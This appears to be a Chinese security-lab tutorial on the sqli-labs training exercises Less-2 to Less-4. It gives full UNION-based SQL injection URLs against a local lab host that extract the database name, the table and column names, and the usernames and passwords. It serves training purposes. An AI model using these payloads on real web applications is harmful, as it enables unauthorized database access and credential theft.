声明
本文作者:CloudStrife(玄螭安全实验室-核心成员)
玄螭安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明,文章来源等全部内容。未经玄螭安全实验室允许,不得修改文章内容,不能以任何方式将其用于商业目的。
Sqli-labs教程第二章(Less-2-Less-4)
目录:
1、Less-2
2、Less-3
3、Less-4
1、Less-2
进入Less-2,和第一题一样,输入
|
http://192.168.85.137/sqli-labs-master/Less-2/?id=1' |
页面提示错误,接着再输入
|
http://192.168.85.137/sqli-labs-master/Less-2/?id=1'' |
还是提示错误。那么该题目应该是数字型注入,不需要加引号,直接跟上union即可。所以payload如下。
|
http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+ 获得数据库名 http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 获取表名 http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+ 获取users表的字段 http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username),3 from security.users --+ 获取users表中username值 http://192.168.85.137/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(password),3 from security.users --+ 获取users表中password值 |
此题结束。
2、Less-3
接下来看到Less-3,单引号报错,双引号不报错,报错信息如下。
显示在''1'') LIMIT 0,1'附近有语法错误,那么将其闭合即可。payload如下。
|
http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,2,database() --+ 获得数据库名 http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 获取表名 http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+ 获取users表的字段 http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username),3 from security.users --+ 获取users表中username值 http://192.168.85.137/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(password),3 from security.users --+ 获取users表中password值 |
查看源代码,在id外,添加了括号进行包围,所以使用-1')就可以进行注入。
3、Less-4
单引号不报错,双引号报错,查看报错信息。
提示我们在'"1"") LIMIT 0,1'处有语法错误,那么换成双引号,就可以闭合了。payload如下。
|
http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,2,database() --+ 获得数据库名 http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 获取表名 http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+ 获取users表的字段 http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username),3 from security.users --+ 获取users表中username值 http://192.168.85.137/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(password),3 from security.users --+ 获取users表中password值 |
查看源代码,在id外,添加了双引号进行包围,所以使用-1")就可以进行注入。
原文始发于微信公众号(玄螭安全实验室):sqli-labs教程第二章(Less-2-Less-4)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论